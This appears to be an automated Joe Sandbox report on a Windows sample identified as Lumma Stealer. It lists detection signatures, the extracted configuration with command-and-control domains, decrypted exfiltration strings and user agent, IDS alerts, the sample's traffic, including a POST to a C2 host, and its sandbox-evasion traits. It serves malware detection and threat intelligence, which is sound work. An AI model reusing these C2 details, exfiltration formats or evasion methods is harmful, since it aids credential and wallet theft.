Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1526563
MD5:c8916aae53838af9e4dd5b25929c3011
SHA1:137ee51345eb0ba5009f4c2f8e063dfa02d4da94
SHA256:20c63022ebdfb3653fc44fe6a87e42dcff15a06bf396d7ff361921f0d9c38871
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C8916AAE53838AF9E4DD5B25929C3011)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["spirittunek.stor", "licendfilteo.site", "dissapoiznw.stor", "studennotediw.stor", "bathdoomgaz.stor", "eaglepawnoy.stor", "mobbipenju.stor", "clearancek.site"], "Build id": "4SD0y4--legendaryy"}
SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T10:44:00.065879+020020546531A Network Trojan was detected192.168.2.549705188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T10:44:00.065879+020020498361A Network Trojan was detected192.168.2.549705188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T10:43:57.733408+020020564771Domain Observed Used for C2 Detected192.168.2.5555961.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T10:43:56.857343+020020564711Domain Observed Used for C2 Detected192.168.2.5561231.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T10:43:57.706846+020020564811Domain Observed Used for C2 Detected192.168.2.5500541.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T10:43:57.695007+020020564831Domain Observed Used for C2 Detected192.168.2.5525151.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T10:43:57.757952+020020564731Domain Observed Used for C2 Detected192.168.2.5608821.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T10:43:57.624664+020020564851Domain Observed Used for C2 Detected192.168.2.5652461.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T10:43:57.745624+020020564751Domain Observed Used for C2 Detected192.168.2.5615791.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T10:43:57.722814+020020564791Domain Observed Used for C2 Detected192.168.2.5576891.1.1.153UDP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: file.exeAvira: detected
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badgesURL Reputation: Label: malware
    Source: file.exe.6360.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["spirittunek.stor", "licendfilteo.site", "dissapoiznw.stor", "studennotediw.stor", "bathdoomgaz.stor", "eaglepawnoy.stor", "mobbipenju.stor", "clearancek.site"], "Build id": "4SD0y4--legendaryy"}
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: file.exeJoe Sandbox ML: detected
    Source: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.stor
    Source: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.stor
    Source: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.stor
    Source: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.stor
    Source: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.stor
    Source: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.stor
    Source: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_005BD110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_005BD110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh0_2_005F63B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h0_2_005F695B
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_005F99D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_005BFCA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_005C0EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_005F4040
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [edx]0_2_005B1000
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then dec ebx0_2_005EF030
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_005C6F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_005F6094
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_005DD1E1
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_005D2260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], ax0_2_005D2260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_005C42FC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax0_2_005BA300
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_005E23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_005E23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_005E23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], al0_2_005E23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_005E23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+14h]0_2_005E23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_005CD457
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]0_2_005F1440
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_005DC470
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], 00000000h0_2_005CB410
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_005DE40C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh0_2_005F64B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_005D9510
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_005C6536
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh0_2_005F7520
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]0_2_005B8590
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_005EB650
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_005DE66A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]0_2_005F7710
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_005F5700
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]0_2_005F67EF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_005DD7AF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_005D28E9
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_005CD961
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h0_2_005F3920
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_005B49A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_005B5A50
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_005F4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_005C1A3C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_005C1ACD
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+000006B8h]0_2_005CDB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h0_2_005CDB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_005F9B60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_005C1BEE
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_005C3BE2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_005E0B80
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h0_2_005DEC48
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h0_2_005D7C00
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh0_2_005EFC20
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h0_2_005DCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_005DCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h0_2_005DCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_005F9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh0_2_005F9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_005DAC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], ax0_2_005DAC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh0_2_005DFD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_005DDD29
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_005F8D8A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, word ptr [ecx]0_2_005DAE57
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_005D5E70
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_005D7E60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, ecx0_2_005C4E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_005C1E93
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_005C6EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [ebp+00h]0_2_005BBEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_005B6EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_005EFF70
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_005D9F62
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], 0000h0_2_005CFFDF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_005F5FD6
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_005B8FD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h0_2_005F7FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_005F7FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_005C6F91

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:60882 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:52515 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:55596 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:57689 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:50054 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:61579 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:65246 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:56123 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.96.3:443
    Source: Malware configuration extractorURLs: spirittunek.stor
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Malware configuration extractorURLs: dissapoiznw.stor
    Source: Malware configuration extractorURLs: studennotediw.stor
    Source: Malware configuration extractorURLs: bathdoomgaz.stor
    Source: Malware configuration extractorURLs: eaglepawnoy.stor
    Source: Malware configuration extractorURLs: mobbipenju.stor
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sensatinwu.buzz
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sensatinwu.buzz
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sensatinwu.buzz
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094750682.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094750682.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094750682.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000003.2076037968.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F8D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076150417.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatt
    Source: file.exe, 00000000.00000003.2076037968.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F8D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076150417.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstat
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094750682.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000000.00000003.2076037968.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F8D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076150417.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascriH
    Source: file.exe, 00000000.00000003.2076037968.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F8D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076150417.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applicat4
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=AeTz
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
